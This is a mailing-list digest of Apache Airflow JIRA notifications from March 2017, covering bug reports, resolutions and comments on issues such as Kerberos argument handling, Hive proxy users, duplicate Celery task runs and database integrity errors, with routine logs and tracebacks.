[jira] [Updated] (AIRFLOW-986) HiveCliHook silently ignores 'proxy_user' in connection's extra parameters

2017-03-14 Thread Yi Wei (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-986?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Yi Wei updated AIRFLOW-986:
---
Affects Version/s: Airflow 2.0

> HiveCliHook silently ignores 'proxy_user' in connection's extra parameters
> --
>
> Key: AIRFLOW-986
> URL: https://issues.apache.org/jira/browse/AIRFLOW-986
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: hive_hooks
>Affects Versions: Airflow 2.0, Airflow 1.8, Airflow 1.7.1, Airflow 1.7.0, 
> Airflow 1.6.2, Airflow 1.7.1.2, Airflow 1.7.1.3
>Reporter: Yi Wei
>Assignee: Yi Wei
>Priority: Minor
>
> HiveCliHook just ignores the value of key 'proxy_user' in a connection's 
> extra parameters JSON object. There's two exceptions, if a user specify 
> 'proxy_user' to be 'login' or 'owner', HiveCliHook will append 
> 'hive.server2.proxy.user' to JDBC url, otherwise the proxy_user value is 
> always ignored.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-987) `airflow kerberos` ignores --keytab and --principal arguments

2017-03-14 Thread Ruslan Dautkhanov (JIRA)
Ruslan Dautkhanov created AIRFLOW-987:
-

 Summary: `airflow kerberos` ignores --keytab and --principal 
arguments
 Key: AIRFLOW-987
 URL: https://issues.apache.org/jira/browse/AIRFLOW-987
 Project: Apache Airflow
  Issue Type: Bug
  Components: security
Affects Versions: Airflow 1.8
 Environment: 1.8-rc5
Reporter: Ruslan Dautkhanov


No matter which arguments I pass to `airflow kerberos`, 
it always executes as `kinit -r 3600m -k -t airflow.keytab -c 
/tmp/airflow_krb5_ccache airflow`

So it failes with expected "kinit: Keytab contains no suitable keys for 
airf...@corp.some.com while getting initial credentials"

Tried different arguments, -kt and --keytab, here's one of the runs (some lines 
wrapped for readability):

{noformat}
$ airflow kerberos -kt /home/rdautkha/.keytab rdautkha...@corp.some.com
[2017-03-14 23:50:11,523] {__init__.py:57} INFO - Using executor LocalExecutor

[2017-03-14 23:50:12,069] {kerberos.py:43} INFO - Reinitting kerberos from 
keytab: 
kinit -r 3600m -k -t airflow.keytab -c /tmp/airflow_krb5_ccache airflow
[2017-03-14 23:50:12,080] {kerberos.py:55} ERROR -
 Couldn't reinit from keytab! `kinit' exited with 1.

kinit: Keytab contains no suitable keys for airf...@corp.some.com 
while getting initial credentials
{noformat}

1.8-rc5



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-986) HiveCliHook silently ignores 'proxy_user' in connection's extra parameters

2017-03-14 Thread Yi Wei (JIRA)
Yi Wei created AIRFLOW-986:
--

 Summary: HiveCliHook silently ignores 'proxy_user' in connection's 
extra parameters
 Key: AIRFLOW-986
 URL: https://issues.apache.org/jira/browse/AIRFLOW-986
 Project: Apache Airflow
  Issue Type: Bug
  Components: hive_hooks
Affects Versions: Airflow 1.8, Airflow 1.7.1, Airflow 1.7.0, Airflow 1.6.2, 
Airflow 1.7.1.2, Airflow 1.7.1.3
Reporter: Yi Wei
Assignee: Yi Wei
Priority: Minor


HiveCliHook just ignores the value of key 'proxy_user' in a connection's extra 
parameters JSON object. There's two exceptions, if a user specify 'proxy_user' 
to be 'login' or 'owner', HiveCliHook will append 'hive.server2.proxy.user' to 
JDBC url, otherwise the proxy_user value is always ignored.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-736) Sub dag status still "running" even if all task instances are complete

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-736?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-736.

Resolution: Cannot Reproduce

> Sub dag status still "running" even if all task instances are complete
> --
>
> Key: AIRFLOW-736
> URL: https://issues.apache.org/jira/browse/AIRFLOW-736
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: scheduler
>Affects Versions: Airflow 1.7.1.3
>Reporter: Shreyas Joshi
>
> Sometimes, a sub dag is still running, even though all the task instances in 
> it are successful. The log is an endless list of waiting for all the tasks to 
> finish like:
> {noformat}
> [2017-01-05 00:46:26,031] {jobs.py:997} INFO - [backfill progress] | waiting: 
> 1 | succeeded: 6 | kicked_off: 7 | failed: 0 | skipped: 4 | deadlocked: 0
> [2017-01-05 00:46:31,033] {jobs.py:997} INFO - [backfill progress] | waiting: 
> 1 | succeeded: 6 | kicked_off: 7 | failed: 0 | skipped: 4 | deadlocked: 0
> {noformat}
> with this line hidden in there:
> {noformat}
> 2017-01-05 00:10:21,037] {jobs.py:965} ERROR - The airflow run command failed 
> at reporting an error. This should not occur in normal circumstances. Task 
> state is 'running',reported state is 'success'. TI is  something.something_child 2017-01-03 23:00:00 [running]>
> {noformat}
> There are no dependencies on past runs. We are using the CeleryExecutor with 
> three worker nodes. AIRFLOW-396 seems very similar to this.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-985) Extend the sqoop operator/hook with additional parameters

2017-03-14 Thread Fokko Driesprong (JIRA)
Fokko Driesprong created AIRFLOW-985:


 Summary: Extend the sqoop operator/hook with additional parameters
 Key: AIRFLOW-985
 URL: https://issues.apache.org/jira/browse/AIRFLOW-985
 Project: Apache Airflow
  Issue Type: Bug
Reporter: Fokko Driesprong


The current implementation of the sqoop hook/operator is rather inelaborate. 
For example, when exporting from hdfs to a rdbms, quite parameters are missing, 
e.g. it is not possible to set the format of the null values.

Also some arguments can be extended, for example the current implementation 
does not support reading parquet.

Beside all, tests need to be added to ensure proper behaviour.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-744) incompatibility notice for 1.7.3 and note on how to fix it

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-744?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-744.

Resolution: Fixed

> incompatibility notice for 1.7.3 and note on how to fix it
> --
>
> Key: AIRFLOW-744
> URL: https://issues.apache.org/jira/browse/AIRFLOW-744
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: docs, webserver
>Reporter: Jayesh
>Priority: Minor
>
> since airflow 1.7.3 has some compatibility issues regarding Jinja2 (2.9.2), 
> its been breaking for lot of people around the world. 
> so we came up with suggestion to put up the notice on website about this 
> version and also note on how to fix it ( most likely only downgrading to 
> Jinja2 2.8.1 is required )



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-740) jinja2 2.9 seems incompatible with current airflow

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-740?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-740.

   Resolution: Fixed
Fix Version/s: 1.8.0

> jinja2 2.9 seems incompatible with current airflow
> --
>
> Key: AIRFLOW-740
> URL: https://issues.apache.org/jira/browse/AIRFLOW-740
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> {code}
> ==
> ERROR: test_dag_views (tests.WebUiTests)
> --
> Traceback (most recent call last):
>   File "/home/travis/build/apache/incubator-airflow/tests/core.py", line 
> 1423, in test_dag_views
> '/admin/airflow/graph?dag_id=example_bash_operator')
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/werkzeug/test.py",
>  line 778, in get
> return self.open(*args, **kw)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/testing.py",
>  line 127, in open
> follow_redirects=follow_redirects)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/werkzeug/test.py",
>  line 751, in open
> response = self.run_wsgi_app(environ, buffered=buffered)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/werkzeug/test.py",
>  line 668, in run_wsgi_app
> rv = run_wsgi_app(self.application, environ, buffered=buffered)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/werkzeug/test.py",
>  line 871, in run_wsgi_app
> app_rv = app(environ, start_response)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1994, in __call__
> return self.wsgi_app(environ, start_response)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1985, in wsgi_app
> response = self.handle_exception(e)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1540, in handle_exception
> reraise(exc_type, exc_value, tb)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1982, in wsgi_app
> response = self.full_dispatch_request()
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1614, in full_dispatch_request
> rv = self.handle_user_exception(e)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1517, in handle_user_exception
> reraise(exc_type, exc_value, tb)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1612, in full_dispatch_request
> rv = self.dispatch_request()
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1598, in dispatch_request
> return self.view_functions[rule.endpoint](**req.view_args)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask_admin/base.py",
>  line 69, in inner
> return self._run_view(f, *args, **kwargs)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask_admin/base.py",
>  line 368, in _run_view
> return fn(self, *args, **kwargs)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask_login.py",
>  line 755, in decorated_view
> return func(*args, **kwargs)
>   File "/home/travis/build/apache/incubator-airflow/airflow/www/utils.py", 
> line 221, in view_func
> return f(*args, **kwargs)
>   File "/home/travis/build/apache/incubator-airflow/airflow/www/utils.py", 
> line 125, in wrapper
> return f(*args, **kwargs)
>   File "/home/travis/build/apache/incubator-airflow/airflow/www/views.py", 
> line 1438, in graph
> edges=json.dumps(edges, indent=2),)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask_admin/base.py",
>  line 308, in 

[jira] [Resolved] (AIRFLOW-755) trigger dag test overflows datetime.hour

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-755?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-755.

Resolution: Fixed

> trigger dag test overflows datetime.hour
> 
>
> Key: AIRFLOW-755
> URL: https://issues.apache.org/jira/browse/AIRFLOW-755
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
>
> datetime.hour has a range of 0.23 . the trigger dag test uses now.hour()+1 
> which can overflow to 24.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-756) Refactor ssh_hook and ssh_operator

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-756?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-756:
---
Fix Version/s: 1.9.0

> Refactor ssh_hook and ssh_operator
> --
>
> Key: AIRFLOW-756
> URL: https://issues.apache.org/jira/browse/AIRFLOW-756
> Project: Apache Airflow
>  Issue Type: Improvement
>  Components: hooks, operators
>Reporter: Michael Gonzalez
>Assignee: Jayesh
>Priority: Minor
> Fix For: 1.9.0
>
>




--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-757) Set sensible location for processor logs

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-757?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-757.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Set sensible location for processor logs
> 
>
> Key: AIRFLOW-757
> URL: https://issues.apache.org/jira/browse/AIRFLOW-757
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> The current default location for processor logs is /tmp/airflow, this is 
> outside any of the standard locations and could surprise people. Its should 
> default to ~/airflow/logs/processor 



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-928) Same {task,execution_date} run multiple times in worker when using CeleryExecutor

2017-03-14 Thread Alex Guziel (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-928?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15925006#comment-15925006
 ] 

Alex Guziel commented on AIRFLOW-928:
-

[~bolke] Did see a double trigger one hour after, will see if related.

> Same {task,execution_date} run multiple times in worker when using 
> CeleryExecutor
> -
>
> Key: AIRFLOW-928
> URL: https://issues.apache.org/jira/browse/AIRFLOW-928
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: celery
>Affects Versions: Airflow 1.7.1.3
> Environment: Docker
>Reporter: Uri Shamay
> Attachments: airflow.log, dag_runs.png, dummy_dag.py, processes.list, 
> rabbitmq.queue, scheduler.log, worker_2.log, worker.log
>
>
> Hi,
> When using with Airflow with CeleryExecutor, both RabbitMQ && Redis I tested, 
> I see that when workers are down, the scheduler run each period of time 
> **append** to the same key of {task,execution_date} in the broker, the same 
> {task,execution_date}, what means is that if workers are down/can't connect 
> to broker for few hours, I got in the broker thousands of same executions.
> In my scenario I have just one dummy dag to run with dag_concurrency of 4,
> I expected in that scenario that broker will hold just 4 messages, and the 
> scheduler shouldn't queuing another and another and another for same {task, 
> execution_date}
> What happened is that when workers start to consume messages, they got 
> thousands of tasks for just 4 tasks, and when they trying to write to 
> database for task_instances - there are errors of integrity while such 
> {task,execution_date} already exist.
> Note that in my test after let Airflow to consume works of just one dag 
> without workers for few hours, then I connect to the broker outside by custom 
> client and retrieve the messages - there was thousands of same 
> {dag,execution_date}.
> Even if the case is that there are a lot of dag works on the same key that 
> run just one instance when poll thousands - it's still bad behavior, better 
> to produce one message to the queue, and if some timeout occurred (like 
> visibility), to set the key - and not append to it. 
> What happened is when workers are down for long time and have a lot of jobs 
> that scheduled each minute, when workers come back, they got thousands of 
> same jobs => cause to the worker to run the same dags a lot of times => a lot 
> of wasted python runners => utilized all celery worker threads/processes => 
> starve all other jobs till he understood that need just one instance from all 
> same.
> Attached files:
> 1. airflow.log - this is the task log, you can see that few instances 
> processes of same {task,execution_date} write to the same log file.
> 2. worker.log - this is the worker log, you can see that worker trying to run 
> same {task,execution_date} multiple times + the errors from the database 
> integrity that said that those tasks on those dates already exists.
> 3. scheduler.log to show that scheduler decided to send again and again and 
> again infinitely the same {job,execution_date}
> 4. the dummy_dag.py of the test
> 5. rabbitmq.queue - show that after 5 minutes the broker queue contains 40 
> messages of same 4 {job,execution_date}
> 6. dag_runs.png - show that there are only 4 jobs that need to be run, while 
> there are much more messages in the queue
> 7. processes.list - show that when start worker and doing: ps -ef | grep 
> "airflow run", it show that worker run multiple times same 
> {job,execution_date}
> 8. worker_2.log - show that when worker started - the same 
> {job,execution_date} keys shown multiple times
> Thanks.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-760) Update systemd scripts

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-760?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-760.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Update systemd scripts 
> ---
>
> Key: AIRFLOW-760
> URL: https://issues.apache.org/jira/browse/AIRFLOW-760
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> systemd scripts are not compatible with 1.8



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-759) The dependency checker should verify if the interval is the first interval after start_date

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-759?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-759.

   Resolution: Fixed
Fix Version/s: 1.8.0

> The dependency checker should verify if the interval is the first interval 
> after start_date 
> 
>
> Key: AIRFLOW-759
> URL: https://issues.apache.org/jira/browse/AIRFLOW-759
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> Since 1.8 we support auto aligned start_date and interval. This is not 
> reflected in the dependency checker and as such depend_on_past tasks will 
> fail if the start_date and the execution_date are not aligned.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-779) Task should fail with specific message if task instance is deleted

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-779?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-779.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Task should fail with specific message if task instance is deleted
> --
>
> Key: AIRFLOW-779
> URL: https://issues.apache.org/jira/browse/AIRFLOW-779
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Alex Guziel
>Assignee: Alex Guziel
>Priority: Trivial
> Fix For: 1.8.0
>
>
> Right now, when a task instance is deleted in the DB (as is in the UI task 
> instances page), it will fail with a None have the state field accessed. We 
> should handle this explicitly and give an explicit message.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-789) Update UPDATING.md for Airflow 1.8

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-789.

Resolution: Fixed

> Update UPDATING.md for Airflow 1.8
> --
>
> Key: AIRFLOW-789
> URL: https://issues.apache.org/jira/browse/AIRFLOW-789
> Project: Apache Airflow
>  Issue Type: Task
>  Components: hive_hooks
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> * scheduler config changes
> * airflow.ctx to hive config



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Issue Comment Deleted] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ruslan Dautkhanov updated AIRFLOW-980:
--
Comment: was deleted

(was: It seems database schema changed form 1.7 to 1.8 "column 
task_instance.pid does not exist"
Is there is a documented way to upgrade database to the new schema?)

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution),
> started seeing below error stack again and again .. In scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': 

[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924988#comment-15924988
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

`airflow upgradedb` solved the "column task_instance.pid does not exist" I 
reported earlier. Airflow rocks!
I am going to remove my two previous comments as they aren't related to this 
jira.
Thanks.

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution),
> started seeing below error stack again and again .. In scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] 

[jira] [Resolved] (AIRFLOW-803) Manual triggered dags are not running

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-803?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-803.

Resolution: Fixed

> Manual triggered dags are not running 
> --
>
> Key: AIRFLOW-803
> URL: https://issues.apache.org/jira/browse/AIRFLOW-803
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: scheduler
>Affects Versions: 1.8.0b2
>Reporter: Bolke de Bruin
>Priority: Blocker
> Fix For: 1.8.0b3
>
>
> After cgroups+impersonation was added the task_instances for manually created 
> dag_runs are not executed anymore. This is due to the fact the task_instance 
